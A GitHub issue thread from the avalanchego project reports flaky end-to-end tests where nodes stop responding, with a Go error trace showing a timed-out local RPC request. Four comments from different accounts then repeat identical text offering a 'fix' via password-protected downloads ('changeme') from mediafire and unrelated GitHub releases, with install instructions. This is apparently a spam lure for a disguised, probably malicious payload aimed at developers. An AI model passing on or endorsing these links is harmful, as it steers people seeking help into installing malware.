### ISSUE TITLE
[flake] nodes appear unresponsive in e2e test runs

### ISSUE THREAD

**Issue by marun** [ava-labs/avalanchego#3338]
Failures like the following have appeared more than once in the past week:

- https://github.com/ava-labs/avalanchego/actions/runs/10582232319/job/29321430862
- https://github.com/ava-labs/avalanchego/actions/runs/10586997632/job/29336886528

The symptom is that partway through the test suite nodes stop responding:

```
...
  [FAILED] 
  	Error Trace:	/home/runner/work/avalanchego/avalanchego/tests/fixture/e2e/helpers.go:70
  	            				/home/runner/work/avalanchego/avalanchego/tests/e2e/x/interchain_workflow.go:39
  	            				/home/runner/go/pkg/mod/github.com/onsi/ginkgo/v2@v2.13.1/internal/node.go:463
  	            				/home/runner/go/pkg/mod/github.com/onsi/ginkgo/v2@v2.13.1/internal/suite.go:889
  	            				/opt/hostedtoolcache/go/1.21.13/x64/src/runtime/asm_amd64.s:1650
  	Error:      	Received unexpected error:
  	            	failed to issue request: Post "http://127.0.0.1:39469/ext/bc/C/avax": context deadline exceeded
  ...
```

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
